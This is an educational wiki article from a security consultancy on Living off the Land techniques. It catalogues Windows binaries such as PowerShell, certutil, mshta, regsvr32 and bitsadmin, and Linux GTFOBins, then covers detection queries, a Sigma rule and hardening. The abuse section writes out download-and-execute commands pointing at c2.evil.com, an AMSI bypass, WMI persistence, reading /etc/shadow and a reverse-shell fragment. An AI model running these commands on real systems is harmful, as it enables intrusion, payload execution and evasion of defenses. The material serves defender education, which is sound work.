Skip to content

Services, Wiki-Artikel und Blog-Beiträge durchsuchen

↑↓NavigierenEnterÖffnenESCSchließen

Living off the Land (LotL) - LOLBins and LOLBas

"Living off the Land" (LotL) refers to attack techniques in which attackers use only legitimate tools and utilities already present on the system (...

Table of Contents (3 sections)

Summary: "Living off the Land" (LotL) refers to attack techniques in which attackers use only legitimate tools and utilities already present on the system (LOLBins = Living off the Land Binaries) instead of their own malware. By using PowerShell, WMI, certutil, regsvr32, mshta, and other built-in Windows tools, attackers evade antivirus detection and make forensic attribution more difficult. MITRE ATT&CK; T1218 (System Binary Proxy Execution).

Living off the Land is the stealth concept used by modern attackers: no custom malware that could be detected—instead, exploiting the operating system against itself. PowerShell is a command-line interpreter for administrators—and for attackers. certutil is a certificate management tool—and a downloader. WMI is a management interface—and a persistence technique. LOLBins turn every Windows computer into a potential attacker’s tool.

LOLBins – Living off the Land Binaries

Known LOLBins and their potential uses:

PowerShell (powershell.exe / pwsh.exe):
  MITRE: T1059.001
  Intended purpose: Scripting, administration
  Exploitation:
    # Encoded Command (Base64) – avoids logging:
    powershell -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0AC...
    # = Invoke-WebRequest http://c2.evil.com/payload.exe -OutFile shell.exe

    # AMSI bypass:
    [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')|
      ?{$_}|%{$_.GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)}

    # PowerShell Remoting for lateral movement:
    Invoke-Command -ComputerName DC01 -ScriptBlock {whoami}
    Enter-PSSession -ComputerName FileServer01

    # Download + Execute (without file on disk):
    IEX (New-Object Net.WebClient).DownloadString('http://c2.evil.com/payload.ps1')

WMI (Windows Management Instrumentation):
  MITRE: T1047
  Legitimate Purpose: Hardware queries, software management
  Exploitation:
    # Remote Process Execution:
    wmic /node:192.168.1.10 /user:domain\admin /password:Pass123
      process call create "cmd.exe /c calc.exe"

    # Persistence via WMI Event Subscription:
    # (Starts on system events – survives reboots!)
    wmic /namespace:"\\root\subscription" path __EventFilter
      create Name="PersistFilter", EventNamespace="root\cimv2",
      QueryLanguage="WQL", Query="SELECT * FROM Win32_ModuleLoadTrace"

CertUtil (certutil.exe):
  MITRE: T1105 (Ingress Tool Transfer)
  Normal purpose: Certificate management, PKI
  Misuse:
    # Download files (bypasses simple proxy filters!):
    certutil.exe -urlcache -split -f "http://c2.evil.com/payload.exe" payload.exe

    # Base64 decoding:
    certutil.exe -decode encoded.txt payload.exe
    # (Attacker delivers Base64-encoded payload as a .txt file)

    # Clearing the URL cache (covering tracks):
    certutil.exe -urlcache -split -f "http://c2.evil.com/payload.exe" delete

MSHta (mshta.exe):
  MITRE: T1218.005
  Normal purpose: HTML Application Host (HTA files)
  Abuse:
    # Execute remote HTA:
    mshta.exe "http://c2.evil.com/evil.hta"
    # HTA = HTML + VBScript/JScript → full script access!

    # Phishing: "Please open the HTA file" instead of .exe → often not blocked

regsvr32 (regsvr32.exe):
  MITRE: T1218.010
  Normal purpose: Register COM objects
  Abuse (Squiblydoo):
    # Load and execute a remote COM object:
    regsvr32.exe /s /n /u /i:"http://c2.evil.com/evil.sct" scrobj.dll
    # → SCT file contains JScript/VBScript
    # → regsvr32 is signed by Microsoft → often bypasses AppLocker!

rundll32 (rundll32.exe):
  MITRE: T1218.011
  Normal purpose: Call DLL function
  Abuse:
    # Load URL to JavaScript as a DLL:
    rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";...
    # Execute custom DLL:
    rundll32.exe C:\Users\Public\evil.dll,EntryPoint

wscript / cscript:
  MITRE: T1059.005
  Normal purpose: Execute VBScript/JScript
  Abuse:
    wscript.exe //B "\\share\payload.vbs"  # Silent mode, no dialogs

BitsAdmin (bitsadmin.exe):
  MITRE: T1197
  Normal Purpose: Background Intelligent Transfer Service (Windows Update)
  Abuse:
    # Download:
    bitsadmin /transfer "WindowsUpdate" /download /priority high
      "http://c2.evil.com/payload.exe" "C:\Windows\Temp\payload.exe"
    # Persistence: BITS jobs survive reboots!

LOLBas - Living off the Land-Based Scripts

Beyond Binaries - Scripts and Built-in Features:

Excel/Office Macros (MITRE T1566.001):
  → Phishing: .xlsm, .docm attachment with macro
  → Macro: certutil download + PowerShell execute
  → Modern: also possible in ODF, LibreOffice

Outlook Home Page Attack:
  → Registry: Set Outlook home page to evil.com
  → Persistence: Website loads every time Outlook starts

DLL Hijacking:
  → Legitimate application loads DLL from an insecure path
  → Attacker places their own DLL in the desired location
  → Application loads attacker’s DLL (self-signing not required!)

LOLBAS Reference:
  → lolbas-project.github.io: complete list of all known LOLBins
  → 250+ documented Windows binaries with exploitation examples
  → Categories: Execute, Download, Upload, Compile, Copy, Decode

GTFOBins (Linux equivalent):
  → gtfobins.github.io: LOLBins for Linux
  → SUID exploitation, Sudo escape, capability usage

  Examples:
    # awk as a shell:
    awk 'BEGIN {system("/bin/sh")}'

    # tar for file exfiltration:
    tar -cf /tmp/loot.tar /etc/shadow

    # Python for reverse shell:
    python3 -c 'import socket,os,pty;s=socket.socket(...)'

Detection of LotL attacks

How EDR/SIEM detects LotL attacks:

Enable PowerShell logging:
  # Group Policy: Computer Configuration → Administrative Templates → Windows Components → PowerShell
  Turn on Module Logging:                   ENABLED (all commands)
  Turn on PowerShell Script Block Logging:  ENABLED (including obfuscated scripts)
  Turn on Transcription:                    ENABLED (everything in log file)

  # Event Log: Microsoft-Windows-PowerShell/Operational
  # Event ID 4104: Script Block Logging (the actual command content)
  # Event ID 4103: Module Logging

  # Suspicious PowerShell patterns (Sentinel KQL):
  SecurityEvent
  | where EventID == 4104
  | where ScriptBlockText contains_any
    ("FromBase64String", "IEX", "Invoke-Expression",
     "DownloadString", "WebClient", "AmsiUtils",
     "Bypass", "HideWindow", "EncodedCommand")
  | project TimeGenerated, Computer, ScriptBlockText

WMI Monitoring:
  # Sysmon Event ID 19-21: WMI Event Subscription
  # Event ID 20: WMI EventFilter + Consumer: Persistence!
  Get-WMIObject -Namespace "root\subscription" -Class __EventFilter
  # → If there are unknown filters: Investigate!

Sigma rule for LotL:
  title: Living off the Land - CertUtil Download
  id: xxx
  status: stable
  description: CertUtil used for file download (LOLBin abuse)
  logsource:
    category: process_creation
    product: windows
  detection:
    selection:
      Image|endswith: '\certutil.exe'
      CommandLine|contains:
        - '-urlcache'
        - '-split'
        - 'http'
    condition: selection
  level: medium
  tags:
    - attack.ingress_tool_transfer
    - attack.t1105

EDR Detection Mechanisms:
  → Behavioral Detection: PowerShell → Network → Exec → Persistence = Suspicious!
  → Process Tree: Word.exe → powershell.exe → curl.exe → SUSPICIOUS
  → Script Analysis: PowerShell script block is checked against patterns
  → API Monitoring: Suspicious API calls (VirtualAlloc + WriteProcessMemory)
  → Parent-Child Anomalies: Excel spawns cmd.exe → ALERT!

Hardening against LotL:
  □ PowerShell: Enforce Constrained Language Mode
    [System.Management.Automation.PSConstrainedLanguageMode]::Enter()
    # Drastically limits PowerShell capabilities

  □ WDAC (Windows Defender Application Control):
    → Run only signed applications (AppLocker successor)
    → LOLBins can be explicitly blocked (e.g., mshta.exe)

  □ Attack Surface Reduction (ASR) Rules (Microsoft Defender):
    Block abuse of exploited vulnerable signed drivers
    Block credential theft from LSASS
    Block Office applications from spawning child processes
    Block execution of potentially obfuscated scripts

  □ Logging: Enable Script Block Logging + Process Command Line Logging
  □ Monitoring: EDR with behavioral detection (CrowdStrike, Defender for Endpoint)

Questions about this topic?

Our experts advise you free of charge and without obligation.

Free Consultation

About the Author

Chris Wojzechowski
Chris Wojzechowski

Geschäftsführender Gesellschafter

E-Mail

Geschäftsführender Gesellschafter der AWARE7 GmbH mit langjähriger Expertise in Informationssicherheit, Penetrationstesting und IT-Risikomanagement. Absolvent des Masterstudiengangs Internet-Sicherheit an der Westfälischen Hochschule (if(is), Prof. Norbert Pohlmann). Bestseller-Autor im Wiley-VCH Verlag und Lehrbeauftragter der ASW-Akademie. Einschätzungen zu Cybersecurity und digitaler Souveränität erschienen u.a. in Welt am Sonntag, WDR, Deutschlandfunk und Handelsblatt.

10 Publikationen
  • Einsatz von elektronischer Verschlüsselung - Hemmnisse für die Wirtschaft (2018)
  • Kompass IT-Verschlüsselung - Orientierungshilfen für KMU (2018)
  • IT Security Day 2025 - Live Hacking: KI in der Cybersicherheit (2025)
  • Live Hacking - Credential Stuffing: Finanzrisiken jenseits Ransomware (2025)
  • Keynote: Live Hacking Show - Ein Blick in die Welt der Cyberkriminalität (2025)
  • Analyse von Angriffsflächen bei Shared-Hosting-Anbietern (2024)
  • Gänsehaut garantiert: Die schaurigsten Funde aus dem Leben eines Pentesters (2022)
  • IT Security Zertifizierungen - CISSP, T.I.S.P. & Co (Live-Webinar) (2023)
  • Sicherheitsforum Online-Banking - Live Hacking (2021)
  • Nipster im Netz und das Ende der Kreidezeit (2017)
IT-Grundschutz-Praktiker (TÜV) IT Risk Manager (DGI) § 8a BSIG Prüfverfahrenskompetenz Ausbilderprüfung (IHK)
This article was last edited on 03/29/2026. Responsible: Chris Wojzechowski, Geschäftsführender Gesellschafter at AWARE7 GmbH. License: CC BY 4.0 - free use with attribution: "AWARE7 GmbH, https://a7.de"